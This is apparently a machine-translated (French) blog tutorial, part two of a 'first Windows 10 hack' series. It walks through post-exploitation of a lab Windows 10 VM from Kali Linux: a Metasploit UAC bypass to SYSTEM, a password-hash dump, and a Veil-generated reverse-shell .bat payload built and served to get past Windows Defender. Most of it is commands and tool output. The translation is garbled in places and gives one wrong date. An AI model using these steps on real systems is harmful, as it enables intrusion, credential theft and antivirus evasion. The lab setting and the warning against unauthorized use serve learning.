Suite, premier piratage de Windows 10

introduction

C'est le 15e jour du calendrier de l'Avent de PRO Co., Ltd. Désolé pour la publication tardive ...! !! !!

Cet article est une suite de «Premier piratage de Windows 10». Je vais essayer de vous faire penser "Est-ce possible de faire ça?" Même si vous le regardez seul, mais si vous voulez l'essayer vous-même, Article précédent / items / 1d035b0413ab60674ccb) Veuillez également l'inclure.

Choses à faire

La dernière fois, j'ai essayé d'attaquer et de contrôler à distance l'environnement cible (Windows10) créé par VM à partir de l'environnement d'attaque (Kali Linux) à l'aide d'un outil appelé Metasploit Framework (ci-après, Metasploit). Cette fois, faisons l'expérience de certaines des choses à faire après avoir pénétré dans le terminal cible.

Ici, on suppose que la session Meterpreter a été établie à l'avance (Article précédent "Permettre au terminal cible d'être contrôlé depuis le terminal d'attaque" / 1d035b0413ab60674ccb #% E6% 94% BB% E6% 92% 83% E7% AB% AF% E6% 9C% AB% E3% 81% 8B% E3% 82% 89% E3% 82% BF% E3% 83% BC% E3% 82% B2% E3% 83% 83% E3% 83% 88% E7% AB% AF% E6% 9C% AB% E3% 82% 92% E5% 88% B6% E5% BE% A1% Voir E3% 81% A7% E3% 81% 8D% E3% 82% 8B% E3% 82% 88% E3% 81% 86% E3% 81% AB% E3% 81% 99% E3% 82% 8B)) ..

Mise en garde!

Cet article ne vise pas à recommander un accès non autorisé. ** Ne faites jamais ce que vous introduisez dans l'environnement de quelqu'un d'autre **

Environnement de vérification

Identique à Dernière fois.

Terminal adresse IP
Kali Linux (terminal d'attaque) 10.0.0.2
Windows10 (terminal cible) 10.0.0.102

Prendre une capture d'écran

Entrez la commande suivante pour filmer l'écran actuellement affiché sur le terminal cible.

meterpreter > screenshot
Screenshot saved to: /root/ImgBawmm.jpeg

Le cadre rouge est une capture d'écran du terminal cible. スクリーンショット 2019-12-15 16.04.38.png

Obtenir l'autorité SYSTEM

Si vous ne disposez pas de privilèges d'administrateur, diverses opérations seront limitées, vous devrez donc élever vos privilèges.

Tentative d'élévation de l'autorité avec la commande getsystem (échec)

Vérifiez les autorisations actuelles.

meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa

Meterpreter fournit une commande getsystem qui tente d'élever aux privilèges SYSTEM, mais échoue car l'utilisateur intrus a de faibles privilèges.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)

Essayez un module qui contourne la fonctionnalité UAC

La commande getsystem a échoué car elle a été bloquée par la fonctionnalité de contrôle de compte d'utilisateur Windows (UAC) et nous recherchons un module pour la contourner.

Tout d'abord, ramenez l'invite Meterpreter en arrière-plan et revenez à l'invite msf.

meterpreter > background
[*] Backgrounding session 1..
msf5 exploit(multi/handler) > 

Vérifiez la session connectée

msf5 exploit(multi/handler) > sessions -i

Active sessions
===============

  Id  Name  Type                     Information                                Connection
  --  ----  ----                     -----------                                ----------
  1         meterpreter x64/windows  DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F  10.0.0.2:4444 -> 10.0.0.102:50763 (10.0.0.102)

Recherchez les modules avec le mot-clé "bypassuac".

msf5 exploit(multi/handler) > search bypassuac

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   1   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   2   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   3   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   4   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   5   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   6   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   7   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
   8   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   9   exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   10  exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   11  exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   12  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry

Utilisez les modules suivants pour envoyer Exploit via des sessions établies.

8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup   <----Utiliser le module d'entrée
msf5 exploit(windows/local/bypassuac_silentcleanup) > show targets  <----contribution

Exploit targets:

   Id  Name
   --  ----
   0   Microsoft Windows

msf5 exploit(windows/local/bypassuac_silentcleanup) > set TARGET 0   <----Ensemble cible d'entrée
TARGET => 0
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 1   <----Ensemble de sessions d'entrée
SESSION => 1
msf5 exploit(windows/local/bypassuac_silentcleanup) > set payload windows/x64/meterpreter/reverse_tcp   <----Définir la charge utile cible d'entrée
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 10.0.0.2   <----Entrée: définir l'hôte de secours
LHOST => 10.0.0.2
msf5 exploit(windows/local/bypassuac_silentcleanup) > show options   <----Confirmation des paramètres d'entrée

Module options (exploit/windows/local/bypassuac_silentcleanup):

   Name       Current Setting                                          Required  Description
   ----       ---------------                                          --------  -----------
   PSH_PATH   %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe  yes       The path to the Powershell binary.
   SESSION    1                                                        yes       The session to run this module on.
   SLEEPTIME  0                                                        no        The time (ms) to sleep before running SilentCleanup


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.0.2         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows


msf5 exploit(windows/local/bypassuac_silentcleanup) > exploit   <----Exécution d'entrée

[*] Started reverse TCP handler on 10.0.0.2:4444 
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:50983) at 2019-12-15 18:17:57 +0900

meterpreter >    <--Réussite lorsque l'invite meterpreter est renvoyée

Essayez de rehausser l'autorité avec getsystem (succès)

meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa   <--Utilisateur normal avant exécution
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM   <--Autorité SYSTÈME

Vous disposez désormais des privilèges SYSTEM.

Obtenez le hachage du mot de passe

Une des choses que vous pouvez faire après avoir obtenu les privilèges SYSTEM est d'obtenir un hachage de mot de passe. Le hachage obtenu est principalement utilisé pour l'analyse des mots de passe de Windows. De plus, l'analyse des mots de passe ne sera pas traitée cette fois.

S'il s'agit d'un compte local, l'authentification de connexion est gérée dans la base de données SAM (fichier "C: \ Windows \ System32 \ config \ SAM") et le mot de passe est enregistré au format de hachage.

Dans Metasploit, vous pouvez obtenir le hachage du mot de passe avec la commande run hashdump, mais vous obtiendrez une erreur si vous ne disposez pas des privilèges SYSTEM.

meterpreter > run hashdump

[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d1584c448032fe34d1e8e158d04561ed...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


<Hachage du mot de passe>

Il est affiché dans la partie .

Évitez les antivirus

Établissez une session Meterpreter en évitant la détection de virus par un antivirus.

Créez une charge utile qui évite l'antivirus dans Veil

Installez Veil Framework

Veil Framwwork (Veil) Un groupe d'outils qui génèrent des charges utiles qui échappent à l'antivirus.

Veil n'est pas disponible sur Kali Linux, donc installez-le séparément.

root@kali:~# apt install veil-evasion

Lancer Veil

Exécutez la commande suivante avec une connexion GUI à Kali. En cours de route, il vous sera demandé si vous souhaitez installer les dépendances, alors sélectionnez "s" (installer en mode silencieux).

root@kali:~# veil
===============================================================================
                             Veil | [Version]: 3.1.12
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool

Veil>: 
 [!] ERROR #2-3: Can't find the WINE profile for Ruby v1.8.7 (/var/lib/veil/wine//drive_c/Ruby187/bin/ruby.exe).   Run: /usr/share/veil/config/setup.sh --force --silent

Créer une charge utile avec Veil

Mettre à jour Veil

Les technologies de détection de virus et d'évasion sont constamment mises à jour, alors tenez-les à jour pour augmenter le taux de réussite de l'évasion autant que possible.

Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 203 not upgraded.


Veil has checked for updates, press enter to continue

Sélectionnez un outil

Deux outils, Evasion et Ordnance, ont été chargés, mais je choisis Evasion car il évite la détection de virus.

Veil>: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Evasion Menu

	41 payloads loaded

Available Commands:

	back			Go to Veil's main menu
	checkvt			Check VirusTotal.com against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload

Sélectionnez une charge utile

Sélectionnez "powershell / meterpreter / rev_tcp.py" qui est le shell inversé pour Windows dans la liste.

Veil/Evasion>: list   <--contribution
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================


 [*] Available Payloads:

	1)	autoit/shellcode_inject/flat.py

	2)	auxiliary/coldwar_wrapper.py
<Omis>
	22)	powershell/meterpreter/rev_tcp.py
<Omis>
	41)	ruby/shellcode_inject/flat.py


Veil/Evasion>: use 22   <--contribution
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload Information:

	Name:		Pure PowerShell Reverse TCP Stager
	Language:	powershell
	Rating:		Excellent
	Description:    pure windows/meterpreter/reverse_tcp stager, no
	                shellcode

Payload: powershell/meterpreter/rev_tcp selected

 Required Options:

Name            	Value   	Description
----            	-----   	-----------
BADMACS         	FALSE   	Checks for known bad mac addresses
DOMAIN          	X       	Optional: Required internal domain
HOSTNAME        	X       	Optional: Required system hostname
LHOST           	        	IP of the Metasploit handler
LPORT           	4444    	Port of the Metasploit handler
MINBROWSERS     	FALSE   	Minimum of 2 browsers
MINPROCESSES    	X       	Minimum number of processes running
MINRAM          	FALSE   	Require a minimum of 3 gigs of RAM
PROCESSORS      	X       	Optional: Minimum number of processors
SLEEP           	X       	Optional: Sleep "Y" seconds, check if accelerated
USERNAME        	X       	Optional: The required user account
USERPROMPT      	FALSE   	Window pops up prior to payload
UTCCHECK        	FALSE   	Check that system isn't using UTC time zone
VIRTUALPROC     	FALSE   	Check for known VM processes

 Available Commands:

	back        	Go back to Veil-Evasion
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option

[powershell/meterpreter/rev_tcp>>]: set LHOST 10.0.0.2   <--Entrée Spécifiez le terminal d'attaque comme destination de connexion
[powershell/meterpreter/rev_tcp>>]: options   <--Confirmation des paramètres d'entrée

<Omis>

Création de brochures

Créez avec la commande generate.

[powershell/meterpreter/rev_tcp>>]: generate   <--contribution
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [>] Please enter the base name for output files (default is payload): evil3   <--Spécifiez le nom de la charge utile d'entrée
<Omis>

Quittez Veil avec la commande exit et copiez la charge utile créée sur votre bureau.

Veil/Evasion>: exit
root@kali:~# cp /var/lib/veil/output/source/evil3.bat /root/Desktop

Évitez la protection en temps réel de Windows Defender

Dans la charge utile créée par Metasploit, si vous ne désactivez pas la protection en temps réel de Windows, elle sera détectée au moment du téléchargement et de l'exécution et vous ne pourrez pas établir de session, mais la charge utile créée ici pourra être téléchargée et exécutée sans être détectée. (En décembre 2009).

Autoriser le téléchargement de la charge utile en externe

Placez la charge utile créée dans un dossier qui peut être téléchargé de l'extérieur et mettez-la en état de veille du shell inversé avec meterpreter. Spécifiez la charge utile comme "windows / meterpreter / reverse_tcp".

root@kali:~# cp /root/Desktop/evil3.bat /var/www/html/share/ 
root@kali:~# service apache2 restart
root@kali:~# msfconsole
<Abréviation>
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit

Téléchargez la charge utile

Téléchargez evil3.bat sur le périphérique cible. Il n'est pas détecté comme un virus à ce stade.

スクリーンショット 2019-12-16 4.30.36.png

Exécutez la charge utile

evil3.bat Double-cliquez pour afficher un écran d'avertissement, mais cliquez sur Exécuter dans les informations détaillées.

スクリーンショット 2019-12-16 4.31.32.png

S'il y a une réaction du côté Kali et que l'invite Meterpreter est renvoyée, cela signifie que la session a été établie sans être détectée. Si vous ne recevez pas de message, il se peut qu'il soit bloqué par une fonction de votre logiciel de sécurité.

finalement

Cette fois, j'ai eu du mal à obtenir l'autorité SYSTEM, car la session n'a pas été établie correctement et voile n'a pas démarré. Fondamentalement, il est préparé pour que vous puissiez tout faire avec une seule commande, et je pensais que c'était facile, mais si vous ne comprenez pas bien le contenu, je pense qu'il est devenu difficile de gérer les problèmes. C'est effrayant que même une telle personne puisse le faire relativement facilement.

référence

[IPUSIRON "Comment créer un laboratoire de piratage: apprentissage de l'expérience de piratage dans un environnement virtuel" Shosuisha (amazon)](https://www.amazon.co.jp/%E3%83%8F%E3%83%83%E3%82 % AD% E3% 83% B3% E3% 82% B0% E3% 83% BB% E3% 83% A9% E3% 83% 9C% E3% 81% AE% E3% 81% A4% E3% 81% 8F % E3% 82% 8A% E3% 81% 8B% E3% 81% 9F-% E4% BB% AE% E6% 83% B3% E7% 92% B0% E5% A2% 83% E3% 81% AB% E3% 81% 8A% E3% 81% 91% E3% 82% 8B% E3% 83% 8F% E3% 83% 83% E3% 82% AB% E3% 83% BC% E4% BD% 93% E9% A8% 93% E5% AD% A6% E7% BF% 92-IPUSIRON-ebook / dp / B07JJKLZNW) FAQ du site d'assistance «Comment créer un laboratoire de piratage» pour «l'apprentissage de l'expérience de piratage dans un environnement virtuel»

Recommended Posts

Suite, premier piratage de Windows 10
Premier hack de Windows 10